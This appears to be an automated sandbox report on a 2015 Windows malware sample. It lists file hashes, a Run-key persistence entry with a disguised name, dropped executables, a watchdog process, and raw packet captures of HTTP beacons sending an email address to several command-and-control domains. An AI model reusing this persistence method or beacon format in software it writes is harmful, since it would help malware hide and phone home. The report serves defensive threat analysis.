Analysis Date: 2015-05-13 00:27:32

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: aef82b02879d09357034738fac2220b7 sha1: 2a9b01096851e74a9f4ec42ff8c0a521c764f818 size: 299008
Section .rdata md5: 0d42f1ba67158c7334ae62a8af289bf4 sha1: 471007079f29975fd8c58cca549eab2ae0a261d6 size: 34816
Section (name not captured) md5: 3d1ba9dd7bd0f81c5a422ca38196821a sha1: 0a0377e1c801d8c2273b121019030db712c7783a size: 97280
Timestamp: 2014-10-30 09:51:59
Packer: Microsoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Tablet Protocol Update Location ➝
C:\Documents and Settings\Administrator\Application Data\menwsrytzppqnjl\ytvmanllrv.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\menwsrytzppqnjl\ytvmanllrv.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\menwsrytzppqnjl\ytvmanllrv.exe

↳ C:\Documents and Settings\Administrator\Application Data\menwsrytzppqnjl\ytvmanllrv.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\menwsrytzppqnjl\ytvmanllrv.aa
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\menwsrytzppqnjl\huwxqce.exe
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\menwsrytzppqnjl\ytvmanllrv.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\menwsrytzppqnjl\ytvmanllrv.exe"

Network Details:
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Flows TCP: 192.168.1.1:1031 ➝
Flows TCP: 192.168.1.1:1032 ➝
Flows TCP: 192.168.1.1:1033 ➝
Flows TCP: 192.168.1.1:1034 ➝
Flows TCP: 192.168.1.1:1035 ➝
Flows TCP: 192.168.1.1:1036 ➝
Flows TCP: 192.168.1.1:1037 ➝
Flows TCP: 192.168.1.1:1038 ➝
Flows TCP: 192.168.1.1:1039 ➝

Raw Pcap:
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6567 61746f72 6965686f   mail=legatorieho
0x00000020 (00032)   72616e61 40796168 6f6f2e63 6f6d266d   rana@yahoo.com&m
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2066   : close..Host: f
0x00000070 (00112)   6c696572 6265666f 72652e6e 65740d0a   lierbefore.net..
0x00000080 (00128)   0d0a                                  ..

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6567 61746f72 6965686f   mail=legatorieho
0x00000020 (00032)   72616e61 40796168 6f6f2e63 6f6d266d   rana@yahoo.com&m
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a206e   : close..Host: n
0x00000070 (00112)   69676874 73707269 6e672e6e 65740d0a   ightspring.net..
0x00000080 (00128)   0d0a                                  ..

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6567 61746f72 6965686f   mail=legatorieho
0x00000020 (00032)   72616e61 40796168 6f6f2e63 6f6d266d   rana@yahoo.com&m
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2063   : close..Host: c
0x00000070 (00112)   61707461 696e7375 63636573 732e6e65   aptainsuccess.ne
0x00000080 (00128)   740d0a0d 0a                           t....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6567 61746f72 6965686f   mail=legatorieho
0x00000020 (00032)   72616e61 40796168 6f6f2e63 6f6d266d   rana@yahoo.com&m
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2065   : close..Host: e
0x00000070 (00112)   6c656374 72696373 7072696e 672e6e65   lectricspring.ne
0x00000080 (00128)   740d0a0d 0a                           t....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6567 61746f72 6965686f   mail=legatorieho
0x00000020 (00032)   72616e61 40796168 6f6f2e63 6f6d266d   rana@yahoo.com&m
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2074   : close..Host: t
0x00000070 (00112)   72616465 73707269 6e672e6e 65740d0a   radespring.net..
0x00000080 (00128)   0d0a0a0d 0a                           .....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6567 61746f72 6965686f   mail=legatorieho
0x00000020 (00032)   72616e61 40796168 6f6f2e63 6f6d266d   rana@yahoo.com&m
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2073   : close..Host: s
0x00000070 (00112)   74726565 74737563 63657373 2e6e6574   treetsuccess.net
0x00000080 (00128)   0d0a0d0a 0a                           .....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6567 61746f72 6965686f   mail=legatorieho
0x00000020 (00032)   72616e61 40796168 6f6f2e63 6f6d266d   rana@yahoo.com&m
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2073   : close..Host: s
0x00000070 (00112)   74726565 7462616e 6b65722e 6e65740d   treetbanker.net.
0x00000080 (00128)   0a0d0a0a 0a                           .....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6567 61746f72 6965686f   mail=legatorieho
0x00000020 (00032)   72616e61 40796168 6f6f2e63 6f6d266d   rana@yahoo.com&m
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2062   : close..Host: b
0x00000070 (00112)   65747465 72737563 63657373 2e6e6574   ettersuccess.net
0x00000080 (00128)   0d0a0d0a 0a                           .....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6567 61746f72 6965686f   mail=legatorieho
0x00000020 (00032)   72616e61 40796168 6f6f2e63 6f6d266d   rana@yahoo.com&m
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2071   : close..Host: q
0x00000070 (00112)   75696574 73756363 6573732e 6e65740d   uietsuccess.net.
0x00000080 (00128)   0a0d0a0a 0a                           .....

Strings:

An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
bad allocation
bad exception
 Base Class Array'
 Base Class Descriptor at (
 Class Hierarchy Descriptor'
 Complete Object Locator'
`copy constructor closure'
- CRT not initialized
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
- floating point support not loaded
invalid string position
j hhKE
j@j ^V
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
npnitbha snbuelo nlpofdm ybasuc edl uzbtipjwo fbepa asq xtc pojyudpda lvqode folm ajp mtirutqmix utvlafpdo riruxef savajaefaj vxnuoh bybav wso mzejomsdu izjudom ctnepcpe ptbopefcea lboyisopp chreguaxf iepvapej gsjunng mkse laujzemu kwa facreeasrv oplqasfle mssuvw pqginiegl cupbol gcu cbguxpqopx xkj jatjujm xlcihi cti bcsuplf cbxu ultusef unnm apvxeomfpa nrhi bjmomt btbor ejadah jffoegpg qiotz you ykt gen asvv rtemo yopepux cqpiae mxgabcferl oelljusf gibvai cwarotm fagdebdgi nasor pidsigbg djvi sbap vbyaedid solji nzcuhwb yboj rptomucup vbnennluhj zlbo pqneiscam blisep ifdiveyj omfoo ihsgepzjo juu frtaizcpao cvbabylofj sulcic pde losuteppj lfluka dgmuv kmninho gvsorchi glefe dsmancpuf gfnic gdbuv fgfu fgugiladg yrqedls ldkoisnqij mbpotgfa ovoc orbnozcl ukcuab rmnajfm ajseuja ceumgif fjwoz faaic iapdli fdsunc jutpemedd wlbasgxeoe disgasop npne azbcemn alsbidm qqo oimiecbad ndnukpp mjtad zmdicoroha dphi tbfijmtaxq kzamadzcae bdgotsmevb bgzuqyyie vmdo dfwo acebl jfbaclv wdapip ccjocm dnfopp swwicjlegl cmgirflupf mkw jgnoxdci glfutnj tyuqoeelsp ajanpalx ztmu mlselojm rcbazapko rbi slcu snfubuv cvguemosl nicpofj aslaove jitva zikeg jjupebo cbb cmgueicivp dgj mnsomkje gmrawt zsmijjpa gboliiwn loafkuuj srsa jvyufpruts ykzilxzefm irpmagj asuyjarl xpcaljnae wqgu dhpudnou fyhooxelwi rwv gsjolgoag zmdey qis rxjiuq maeejte fjza esyti usdfeacp aoe borl rfujalt dqlaksba keuowfakd zgzaju vepmontbi emtnuntfu vljuakzj lsvuwnmudf innf gyfenzn dyl iblarin plef jnapomcgei eca epfhaarc rslodltevg fizdobl jsdo ordejel figs dvjebnw rdjisajsed cwyur flus dlx eccsatfle tptuax brf fjpokwsae ioee bvcawjheo miunde przoor jpre lbgaby jcnarnxi gga fkmurbma rcbox vzuazibey alzbe memfeguwke bjbia flni upaccila mzaoleu ignanu tnm ljgax uocmpiaegr ejjceamwg rplil
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
r|oL tlq
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
+t HHt
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
< tK<	tG
TLOSS error
t$<"u	3
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
v	N+D$
